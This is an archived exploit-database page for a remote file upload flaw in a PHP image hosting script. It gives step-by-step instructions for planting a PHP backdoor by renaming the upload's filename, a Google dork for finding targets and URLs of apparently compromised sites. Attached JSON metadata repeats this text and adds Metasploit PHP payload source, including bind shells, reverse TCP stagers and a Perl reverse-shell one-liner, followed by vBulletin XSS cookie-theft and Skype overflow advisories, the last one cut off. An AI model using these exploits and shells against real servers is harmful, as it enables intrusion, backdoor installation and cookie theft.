Search...

Free Image Hosting Script [ALL VERSIONS] Remote File Upload

2011-12-26T00:00:00

ID 1337DAY-ID-17305
Type zdt
Reporter ySecurity
Modified 2011-12-26T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                                    ,---.                                        o    |
,   .    `---.    ,---.    ,---.    .   .    ,---.    .    |---     ,   .
|   |        |    |---'    |        |   |    |        |    |        |   |
`---|    `---'    `---'    `---'    `---'    `        `    `---'    `---|
`---'                                                               `---'
============================================
Free Image Hosting Script Remote File Upload Vulnerability
============================================
# Exploit Title: Free Image Hosting Script [ALL VERSIONS] Remote File
Upload Vulnerability
# Date: 26/12/11
# Author: ySecurity
# Vendor or Software Link: http://www.photohostingscript.com
# Price: $29.99
# Version: All versions effected
# Category:: Remote File Upload
# Google dork: inurl:"show-image.php?id="
# Tested on: Windows 7
# Vendor HAS been notified.
########################################################################################

Examples:
http://123uppic.com/123uppic.com/pictures/23d9a5e5c290242eb25d8d6dbb063c73.php
http://porkypics.com/pictures/321879194bc8ff2843bf7b63a666f665.php

NOTE: You will ONLY be able to find your shell if the "/pictures"
directory and if the directory is not forbidden.

This exploit allows hackers to upload a PHP backdoor into "/pictures/"
directory via the use of Live HTTP Headers (Firefox Addon)

[Vulnerability]

Tools Needed: Live HTTP Headers, Backdoor Shell

Step 1: Locate upload form on index page.
Step 2: Rename your shell to shell.php.jpg and start capturing data with
Live HTTP Headers
Step 3: Enter tags for the image (can be anything)
Step 4: Replay data with Live HTTP Headers -
Step 5: Change [Content-Disposition: form-data; name="image1";
filename="shell.php.jpg"\r\n] to [Content-Disposition: form-data;
name="image1"; filename="shell.php"\r\n]
Step 6: Locate pictures directory:
www.site.tld/imagehostingscript/pictures/ (usually)
Step 7: Find PHP file (random digits.php) = should look like
(321879194bc8ff2843bf7b63a666f665.php)
Step 8: Navigate to backdoor =
www.site.tld/imagehostingscript/pictures/321879194bc8ff2843bf7b63a666f665.php


########################################################################################

Greets to: Team Intra

Submitted ethically, after disclosure.



#  0day.today [2018-04-04]  #

JSON Vulners Source

Initial Source

{"hash": "ea0cb8042dc8057c054246bc899c9e3d3b5368f45d0cc87d03d1408448e3f565", "id": "1337DAY-ID-17305", "lastseen": "2018-04-04T19:38:50", "viewCount": 1, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "c69d7c10a03fb2b83157bd00094d7486", "key": "href"}, {"hash": "48989ce16a7539f175b7f00189e0d2fa", "key": "modified"}, {"hash": "48989ce16a7539f175b7f00189e0d2fa", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "2b38d01bb54edff28e17c3515a85b1bb", "key": "reporter"}, {"hash": "ba02aac92041c3d94cbe4b6766a3ea1a", "key": "sourceData"}, {"hash": "9eb7bafda7631bf3e29d3b7634af0aca", "key": "sourceHref"}, {"hash": "5692b40bdc97a112cd74bb2ea27aa574", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2018-04-04T19:38:50"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7831", "SECURITYVULNS:DOC:17305", "SECURITYVULNS:DOC:10038"]}], "modified": "2018-04-04T19:38:50"}, "vulnersScore": 0.3}, "type": "zdt", "sourceHref": "https://0day.today/exploit/17305", "description": "Exploit for php platform in category web applications", "title": "Free Image Hosting Script [ALL VERSIONS] Remote File Upload", "history": [{"bulletin": {"hash": "9f90727f180080998a264c1900ce15d2e75be1c71cd68e87ae07441f38c86794", "id": "1337DAY-ID-17305", "lastseen": "2016-04-19T09:58:03", "enchantments": {"score": {"value": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N/", "modified": "2016-04-19T09:58:03"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "2b38d01bb54edff28e17c3515a85b1bb", "key": "reporter"}, {"hash": "2cc730e99ebdd71612c4555f5c984efb", "key": "sourceHref"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "48989ce16a7539f175b7f00189e0d2fa", "key": "modified"}, {"hash": "a83f8918dcac20cb40c84bafa43d748f", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "5692b40bdc97a112cd74bb2ea27aa574", "key": "title"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "48989ce16a7539f175b7f00189e0d2fa", "key": "published"}, {"hash": "e671952d010b5dc63a6486f241a2a074", "key": "sourceData"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/17305", "description": "Exploit for php platform in category web applications", "viewCount": 0, "title": "Free Image Hosting Script [ALL VERSIONS] Remote File Upload", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": " ,---. o |\r\n, . `---. ,---. ,---. . . ,---. . |--- , .\r\n| | | |---' | | | | | | | |\r\n`---| `---' `---' `---' `---' ` ` `---' `---|\r\n`---' `---'\r\n============================================\r\nFree Image Hosting Script Remote File Upload Vulnerability\r\n============================================\r\n# Exploit Title: Free Image Hosting Script [ALL VERSIONS] Remote File\r\nUpload Vulnerability\r\n# Date: 26/12/11\r\n# Author: ySecurity\r\n# Vendor or Software Link: http://www.photohostingscript.com\r\n# Price: $29.99\r\n# Version: All versions effected\r\n# Category:: Remote File Upload\r\n# Google dork: inurl:\"show-image.php?id=\"\r\n# Tested on: Windows 7\r\n# Vendor HAS been notified.\r\n########################################################################################\r\n\r\nExamples:\r\nhttp://123uppic.com/123uppic.com/pictures/23d9a5e5c290242eb25d8d6dbb063c73.php\r\nhttp://porkypics.com/pictures/321879194bc8ff2843bf7b63a666f665.php\r\n\r\nNOTE: You will ONLY be able to find your shell if the \"/pictures\"\r\ndirectory and if the directory is not forbidden.\r\n\r\nThis exploit allows hackers to upload a PHP backdoor into \"/pictures/\"\r\ndirectory via the use of Live HTTP Headers (Firefox Addon)\r\n\r\n[Vulnerability]\r\n\r\nTools Needed: Live HTTP Headers, Backdoor Shell\r\n\r\nStep 1: Locate upload form on index page.\r\nStep 2: Rename your shell to shell.php.jpg and start capturing data with\r\nLive HTTP Headers\r\nStep 3: Enter tags for the image (can be anything)\r\nStep 4: Replay data with Live HTTP Headers -\r\nStep 5: Change [Content-Disposition: form-data; name=\"image1\";\r\nfilename=\"shell.php.jpg\"\\r\\n] to [Content-Disposition: form-data;\r\nname=\"image1\"; filename=\"shell.php\"\\r\\n]\r\nStep 6: Locate pictures directory:\r\nwww.site.tld/imagehostingscript/pictures/ (usually)\r\nStep 7: Find PHP file (random digits.php) = should look like\r\n(321879194bc8ff2843bf7b63a666f665.php)\r\nStep 8: Navigate to backdoor =\r\nwww.site.tld/imagehostingscript/pictures/321879194bc8ff2843bf7b63a666f665.php\r\n\r\n\r\n########################################################################################\r\n\r\nGreets to: Team Intra\r\n\r\nSubmitted ethically, after disclosure.\r\n\r\n\n\n# 0day.today [2016-04-19] #", "published": "2011-12-26T00:00:00", "references": [], "reporter": "ySecurity", "modified": "2011-12-26T00:00:00", "href": "http://0day.today/exploit/description/17305"}, "lastseen": "2016-04-19T09:58:03", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": " ,---. o |\r\n, . `---. ,---. ,---. . . ,---. . |--- , .\r\n| | | |---' | | | | | | | |\r\n`---| `---' `---' `---' `---' ` ` `---' `---|\r\n`---' `---'\r\n============================================\r\nFree Image Hosting Script Remote File Upload Vulnerability\r\n============================================\r\n# Exploit Title: Free Image Hosting Script [ALL VERSIONS] Remote File\r\nUpload Vulnerability\r\n# Date: 26/12/11\r\n# Author: ySecurity\r\n# Vendor or Software Link: http://www.photohostingscript.com\r\n# Price: $29.99\r\n# Version: All versions effected\r\n# Category:: Remote File Upload\r\n# Google dork: inurl:\"show-image.php?id=\"\r\n# Tested on: Windows 7\r\n# Vendor HAS been notified.\r\n########################################################################################\r\n\r\nExamples:\r\nhttp://123uppic.com/123uppic.com/pictures/23d9a5e5c290242eb25d8d6dbb063c73.php\r\nhttp://porkypics.com/pictures/321879194bc8ff2843bf7b63a666f665.php\r\n\r\nNOTE: You will ONLY be able to find your shell if the \"/pictures\"\r\ndirectory and if the directory is not forbidden.\r\n\r\nThis exploit allows hackers to upload a PHP backdoor into \"/pictures/\"\r\ndirectory via the use of Live HTTP Headers (Firefox Addon)\r\n\r\n[Vulnerability]\r\n\r\nTools Needed: Live HTTP Headers, Backdoor Shell\r\n\r\nStep 1: Locate upload form on index page.\r\nStep 2: Rename your shell to shell.php.jpg and start capturing data with\r\nLive HTTP Headers\r\nStep 3: Enter tags for the image (can be anything)\r\nStep 4: Replay data with Live HTTP Headers -\r\nStep 5: Change [Content-Disposition: form-data; name=\"image1\";\r\nfilename=\"shell.php.jpg\"\\r\\n] to [Content-Disposition: form-data;\r\nname=\"image1\"; filename=\"shell.php\"\\r\\n]\r\nStep 6: Locate pictures directory:\r\nwww.site.tld/imagehostingscript/pictures/ (usually)\r\nStep 7: Find PHP file (random digits.php) = should look like\r\n(321879194bc8ff2843bf7b63a666f665.php)\r\nStep 8: Navigate to backdoor =\r\nwww.site.tld/imagehostingscript/pictures/321879194bc8ff2843bf7b63a666f665.php\r\n\r\n\r\n########################################################################################\r\n\r\nGreets to: Team Intra\r\n\r\nSubmitted ethically, after disclosure.\r\n\r\n\n\n# 0day.today [2018-04-04] #", "published": "2011-12-26T00:00:00", "references": [], "reporter": "ySecurity", "modified": "2011-12-26T00:00:00", "href": "https://0day.today/exploit/description/17305"}

{"metasploit": [{"lastseen": "2019-11-27T15:37:30", "bulletinFamily": "exploit", "description": "Run a meterpreter server in PHP. Reverse PHP connect back stager with checks for disabled functions\n", "modified": "2017-09-12T13:53:31", "published": "2015-05-18T07:49:34", "id": "MSF:PAYLOAD/PHP/METERPRETER/REVERSE_TCP_UUID", "href": "", "type": "metasploit", "title": "PHP Meterpreter, PHP Reverse TCP Stager", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/php/reverse_tcp'\n\nmodule MetasploitModule\n\n CachedSize = 1290\n\n include Msf::Payload::Stager\n include Msf::Payload::Php::ReverseTcp\n\n def self.handler_type_alias\n \"reverse_tcp_uuid\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'PHP Reverse TCP Stager',\n 'Description' => 'Reverse PHP connect back stager with checks for disabled functions',\n 'Author' => [ 'egypt', 'OJ Reeves' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Stager' => {'Payload' => \"\"}\n ))\n end\n\n def include_send_uuid\n true\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/php/reverse_tcp_uuid.rb"}, {"lastseen": "2019-11-25T05:40:17", "bulletinFamily": "exploit", "description": "Run a meterpreter server in PHP. Listen for a connection over IPv6 with UUID Support\n", "modified": "2017-09-12T13:53:31", "published": "2015-05-18T07:49:34", "id": "MSF:PAYLOAD/PHP/METERPRETER/BIND_TCP_IPV6_UUID", "href": "", "type": "metasploit", "title": "PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/bind_tcp'\nrequire 'msf/core/payload/php/bind_tcp'\n\nmodule MetasploitModule\n\n CachedSize = 1511\n\n include Msf::Payload::Stager\n include Msf::Payload::Php::BindTcp\n\n def self.handler_type_alias\n \"bind_tcp_ipv6_uuid\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Bind TCP Stager IPv6 with UUID Support',\n 'Description' => 'Listen for a connection over IPv6 with UUID Support',\n 'Author' => [ 'egypt', 'OJ Reeves' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Handler' => Msf::Handler::BindTcp,\n 'Stager' => { 'Payload' => \"\" }\n ))\n end\n\n def use_ipv6\n true\n end\n\n def include_send_uuid\n true\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb"}, {"lastseen": "2019-11-26T10:19:34", "bulletinFamily": "exploit", "description": "Listen for a connection and spawn a command shell via php (IPv6)\n", "modified": "2017-07-24T13:26:21", "published": "2012-01-31T07:11:55", "id": "MSF:PAYLOAD/PHP/BIND_PHP_IPV6", "href": "", "type": "metasploit", "title": "PHP Command Shell, Bind TCP (via php) IPv6", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/payload/php'\nrequire 'msf/core/handler/bind_tcp'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n\n CachedSize = :dynamic\n\n include Msf::Payload::Single\n include Msf::Payload::Php\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'PHP Command Shell, Bind TCP (via php) IPv6',\n 'Description' => 'Listen for a connection and spawn a command shell via php (IPv6)',\n 'Author' => ['egypt', 'diaul <diaul[at]devilopers.org>',],\n 'License' => BSD_LICENSE,\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Handler' => Msf::Handler::BindTcp,\n 'Session' => Msf::Sessions::CommandShell,\n 'PayloadType' => 'cmd',\n 'Payload' =>\n {\n 'Offsets' => { },\n 'Payload' => ''\n }\n ))\n end\n\n #\n # PHP Bind Shell\n #\n def php_bind_shell\n\n dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4);\n shell = <<-END_OF_PHP_CODE\n #{php_preamble({:disabled_varname => dis})}\n $port=#{datastore['LPORT']};\n\n $scl='socket_create_listen';\n if(is_callable($scl)&&!in_array($scl,#{dis})){\n $sock=@$scl($port);\n }else{\n $sock=@socket_create(AF_INET6,SOCK_STREAM,SOL_TCP);\n $ret=@socket_bind($sock,0,$port);\n $ret=@socket_listen($sock,5);\n }\n $msgsock=@socket_accept($sock);\n @socket_close($sock);\n\n while(FALSE!==@socket_select($r=array($msgsock), $w=NULL, $e=NULL, NULL))\n {\n $o = '';\n $c=@socket_read($msgsock,2048,PHP_NORMAL_READ);\n if(FALSE===$c){break;}\n if(substr($c,0,3) == 'cd '){\n chdir(substr($c,3,-1));\n } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {\n break;\n }else{\n #{php_system_block({:cmd_varname=>\"$c\", :output_varname=>\"$o\", :disabled_varname => dis})}\n }\n @socket_write($msgsock,$o,strlen($o));\n }\n @socket_close($msgsock);\n END_OF_PHP_CODE\n\n return shell\n end\n\n #\n # Constructs the payload\n #\n def generate\n return super + php_bind_shell\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/php/bind_php_ipv6.rb"}, {"lastseen": "2019-11-26T10:23:05", "bulletinFamily": "exploit", "description": "Run a meterpreter server in PHP. Reverse PHP connect back stager with checks for disabled functions\n", "modified": "2017-09-12T13:53:31", "published": "2010-06-23T22:24:50", "id": "MSF:PAYLOAD/PHP/METERPRETER/REVERSE_TCP", "href": "", "type": "metasploit", "title": "PHP Meterpreter, PHP Reverse TCP Stager", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/php/reverse_tcp'\n\nmodule MetasploitModule\n\n CachedSize = 1116\n\n include Msf::Payload::Stager\n include Msf::Payload::Php::ReverseTcp\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'PHP Reverse TCP Stager',\n 'Description' => 'Reverse PHP connect back stager with checks for disabled functions',\n 'Author' => 'egypt',\n 'License' => MSF_LICENSE,\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Stager' => {'Payload' => \"\"}\n ))\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/php/reverse_tcp.rb"}, {"lastseen": "2019-11-24T21:38:01", "bulletinFamily": "exploit", "description": "Spawn a shell on the established connection to the webserver. Unfortunately, this payload can leave conspicuous evil-looking entries in the apache error logs, so it is probably a good idea to use a bind or reverse shell unless firewalls prevent them from working. The issue this payload takes advantage of (CLOEXEC flag not set on sockets) appears to have been patched on the Ubuntu version of Apache and may not work on other Debian-based distributions. Only tested on Apache but it might work on other web servers that leak file descriptors to child processes.\n", "modified": "2017-07-24T13:26:21", "published": "2008-09-24T04:41:51", "id": "MSF:PAYLOAD/PHP/SHELL_FINDSOCK", "href": "", "type": "metasploit", "title": "PHP Command Shell, Find Sock", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/payload/php'\nrequire 'msf/core/handler/bind_tcp'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\nrequire 'msf/core/handler/find_shell'\n\nmodule MetasploitModule\n\n CachedSize = :dynamic\n\n include Msf::Payload::Single\n include Msf::Payload::Php\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'PHP Command Shell, Find Sock',\n 'Description' => %Q{\n Spawn a shell on the established connection to\n the webserver. Unfortunately, this payload\n can leave conspicuous evil-looking entries in the\n apache error logs, so it is probably a good idea\n to use a bind or reverse shell unless firewalls\n prevent them from working. The issue this\n payload takes advantage of (CLOEXEC flag not set\n on sockets) appears to have been patched on the\n Ubuntu version of Apache and may not work on\n other Debian-based distributions. Only tested on\n Apache but it might work on other web servers\n that leak file descriptors to child processes.\n },\n 'Author' => [ 'egypt' ],\n 'License' => BSD_LICENSE,\n 'Platform' => 'php',\n 'Handler' => Msf::Handler::FindShell,\n 'Session' => Msf::Sessions::CommandShell,\n 'Arch' => ARCH_PHP\n ))\n end\n\n def php_findsock\n\n var_cmd = '$' + Rex::Text.rand_text_alpha(rand(4) + 6)\n var_fd = '$' + Rex::Text.rand_text_alpha(rand(4) + 6)\n var_out = '$' + Rex::Text.rand_text_alpha(rand(4) + 6)\n shell = <<END_OF_PHP_CODE\n#{php_preamble}\nprint(\"<html><body>\");\nflush();\n\nfunction mysystem(#{var_cmd}){\n #{php_system_block(cmd_varname: var_cmd, output_varname: var_out)}\n return #{var_out};\n}\n\n#{var_fd} = 13;\nfor ($i = 3; $i < 50; $i++) {\n $foo = mysystem(\"/bin/bash 2>/dev/null <&$i -c 'echo $i'\");\n if ($foo != $i) {\n #{var_fd} = $i - 1;\n break;\n }\n}\nprint(\"</body></html>\\n\\n\");\nflush();\n\n#{var_cmd} = \"/bin/bash <&#{var_fd} >&#{var_fd} 2>&#{var_fd}\";\nmysystem(#{var_cmd});\n\nEND_OF_PHP_CODE\n\n\n return shell\n end\n\n #\n # Constructs the payload\n #\n def generate\n return php_findsock\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/php/shell_findsock.rb"}, {"lastseen": "2019-10-23T23:12:08", "bulletinFamily": "exploit", "description": "Listen for a connection and spawn a command shell via php\n", "modified": "2017-07-24T13:26:21", "published": "2006-12-18T22:06:19", "id": "MSF:PAYLOAD/PHP/BIND_PHP", "href": "", "type": "metasploit", "title": "PHP Command Shell, Bind TCP (via PHP)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/payload/php'\nrequire 'msf/core/handler/bind_tcp'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n\n CachedSize = :dynamic\n\n include Msf::Payload::Single\n include Msf::Payload::Php\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'PHP Command Shell, Bind TCP (via PHP)',\n 'Description' => 'Listen for a connection and spawn a command shell via php',\n 'Author' => ['egypt', 'diaul <diaul[at]devilopers.org>',],\n 'License' => BSD_LICENSE,\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Handler' => Msf::Handler::BindTcp,\n 'Session' => Msf::Sessions::CommandShell,\n 'PayloadType' => 'cmd',\n 'Payload' =>\n {\n 'Offsets' => { },\n 'Payload' => ''\n }\n ))\n end\n\n #\n # PHP Bind Shell\n #\n def php_bind_shell\n\n dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4);\n shell = <<-END_OF_PHP_CODE\n #{php_preamble(disabled_varname: dis)}\n $port=#{datastore['LPORT']};\n\n $scl='socket_create_listen';\n if(is_callable($scl)&&!in_array($scl,#{dis})){\n $sock=@$scl($port);\n }else{\n $sock=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);\n $ret=@socket_bind($sock,0,$port);\n $ret=@socket_listen($sock,5);\n }\n $msgsock=@socket_accept($sock);\n @socket_close($sock);\n\n while(FALSE!==@socket_select($r=array($msgsock), $w=NULL, $e=NULL, NULL))\n {\n $o = '';\n $c=@socket_read($msgsock,2048,PHP_NORMAL_READ);\n if(FALSE===$c){break;}\n if(substr($c,0,3) == 'cd '){\n chdir(substr($c,3,-1));\n } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {\n break;\n }else{\n #{php_system_block({:cmd_varname=>\"$c\", :output_varname=>\"$o\", :disabled_varname => dis})}\n }\n @socket_write($msgsock,$o,strlen($o));\n }\n @socket_close($msgsock);\n END_OF_PHP_CODE\n\n return shell\n end\n\n #\n # Constructs the payload\n #\n def generate\n return super + php_bind_shell\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/php/bind_php.rb"}, {"lastseen": "2019-11-17T21:20:53", "bulletinFamily": "exploit", "description": "Creates an interactive shell via perl\n", "modified": "2017-07-24T13:26:21", "published": "2006-12-17T07:57:51", "id": "MSF:PAYLOAD/PHP/REVERSE_PERL", "href": "", "type": "metasploit", "title": "PHP Command, Double Reverse TCP Connection (via Perl)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/payload/php'\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n\n CachedSize = :dynamic\n\n include Msf::Payload::Single\n include Msf::Payload::Php\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'PHP Command, Double Reverse TCP Connection (via Perl)',\n 'Description' => 'Creates an interactive shell via perl',\n 'Author' => 'cazz',\n 'License' => BSD_LICENSE,\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Session' => Msf::Sessions::CommandShell,\n 'PayloadType' => 'cmd',\n 'Payload' =>\n {\n 'Offsets' => { },\n 'Payload' => ''\n }\n ))\n end\n\n #\n # Constructs the payload\n #\n def generate\n buf = \"#{php_preamble}\"\n buf += \"$c = base64_decode('#{Rex::Text.encode_base64(command_string)}');\"\n buf += \"#{php_system_block({:cmd_varname=>\"$c\"})}\"\n return super + buf\n\n end\n\n #\n # Returns the command string to use for execution\n #\n def command_string\n lhost = datastore['LHOST']\n ver = Rex::Socket.is_ipv6?(lhost) ? \"6\" : \"\"\n lhost = \"[#{lhost}]\" if Rex::Socket.is_ipv6?(lhost)\n cmd = \"perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET#{ver}(PeerAddr,\\\"#{lhost}:#{datastore['LPORT']}\\\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'\"\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/php/reverse_perl.rb"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:22", "bulletinFamily": "software", "description": "+--------------------------------------------------------------------\r\n+\r\n+ New post Topic Hijacking XSS All vBulletin\u00ae v 3.x.x\r\n+\r\n+--------------------------------------------------------------------\r\n+ vendor site........: http://www.vbulletin.com/\r\n+ Affected Software .: vbulletin\r\n+ Class .............: XSS\r\n+ Risk ..............: Low\r\n+ Found by ..........: rUnViRuS\r\n+ Original advisory .: http://www.sec-area.com/\r\n+ Contact ...........: stormhacker[at]hotmail[.]com\r\n+ Vulnerable Script..: showthread.php\r\n+--------------------------------------------------------------------\r\nNew Include Redirect Bug XSS [showthread.php] All vBulletin v 3.x.x\r\n\r\nThis injections would allow an attacker to stealing cookies who be opened url\r\n\r\nXss the page and steal cookie :\r\n\r\nxss permanent ( must be post Topic and upload Any File Have Code Xss ) PoC :\r\n\r\n<script>alert(document.cookie)</script>.\r\n\r\nto be used with cookie stealer following is a simple attack :-\r\npost Topic :-\r\nclick on insert link :- \r\nHyperlink information\r\ntype :- (other)\r\nURl :- ../../xss.txt ( path XSS File On Site[Include Path])\r\n\r\n\r\nWhen opened url Will stealing cookies\r\n+--------------------------------------------------------------------\r\n+ [W]orld [D]efacers [T]eam\r\n+ Greets:\r\n+ || rUnViRuS || - || Provide || - || HeX || - || dEv!L RoOT || + || BlackWHITE || - || dOcnok || - || A.tar0uDant.D ||\r\n+ || Pro Hacker || - || DARKFIRE || - || papipsycho ||\r\n+ Sp.Thanx To : Sec-Area.com Member's\r\n+-------------------------[ W D T ]----------------------------------", "modified": "2007-06-20T00:00:00", "published": "2007-06-20T00:00:00", "id": "SECURITYVULNS:DOC:17305", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:17305", "title": "New post Topic Hijacking XSS All vBulletin v 3.x.x (2)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:26", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2007-06-20T00:00:00", "published": "2007-06-20T00:00:00", "id": "SECURITYVULNS:VULN:7831", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7831", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:14", "bulletinFamily": "software", "description": "\r\nTITLE:\r\nSkype Multiple Buffer Overflow Vulnerabilities\r\n\r\nSECUNIA ADVISORY ID:\r\nSA17305\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/17305/\r\n\r\nCRITICAL:\r\nHighly critical\r\n\r\nIMPACT:\r\nDoS, System access\r\n\r\nWHERE:\r\n>From remote\r\n\r\nSOFTWARE:\r\nSkype for Pocket PC 1.x\r\nhttp://secunia.com/product/4252/\r\nSkype for Mac OS X 1.x\r\nhttp://secunia.com/product/5980/\r\nSkype for Mac OS X 0.x\r\nhttp://secunia.com/product/4253/\r\nSkype for Linux 1.x\r\nhttp://secunia.com/product/5402/\r\nSkype for Linux 0.x\r\nhttp://secunia.com/product/4251/\r\nSkype for Windows 1.x\r\nhttp://secunia.com/product/4250/\r\n\r\nDESCRIPTION:\r\nSome vulnerabilities have been reported in Skype, which can be\r\nexploited by malicious people to cause a DoS or to compromise a\r\nuser's system.\r\n\r\n1) A boundary error exists when handling Skype-specific URI types\r\ne.g. "callto://" and "skype://". This can be exploited to cause a\r\nbuffer overflow and allows arbitrary code execution when the user\r\nclicks on a specially-crafted Skype-specific URL.\r\n\r\nThe vulnerability is related to:\r\nSA13191\r\n\r\n2) A boundary error exists in the handling of VCARD imports. This can\r\nbe exploited to cause a buffer overflow and allows arbitrary code\r\nexecution when the user imports a specially-crafted VCARD.\r\n\r\nVulnerability #1 and #2 has been reported in Skype for Windows\r\nRelease 1.1.*.0 through 1.4.*.83.\r\n\r\n3) A boundary error exists in the handling of certain unspecified\r\nSkype client network traffic. This can be exploited to cause a\r\nheap-based buffer overflow.\r\n\r\nSuccessful exploitation crashes the Skype client.\r\n\r\nThe vulnerability has been reported in the following versions:\r\n* Skype for Windows Release 1.4.*.83 and prior.\r\n* Skype for Mac OS X Release 1.3.*.16 and prior.\r\n* Skype for Linux Release 1.2.*.17 and prior.\r\n* Skype for Pocket PC Release 1.1.*.6 and prior.\r\n\r\nSOLUTION:\r\nUpdate to the fixed version.\r\nhttp://www.skype.com/download/\r\n\r\nSkype for Windows:\r\nUpdate to Release 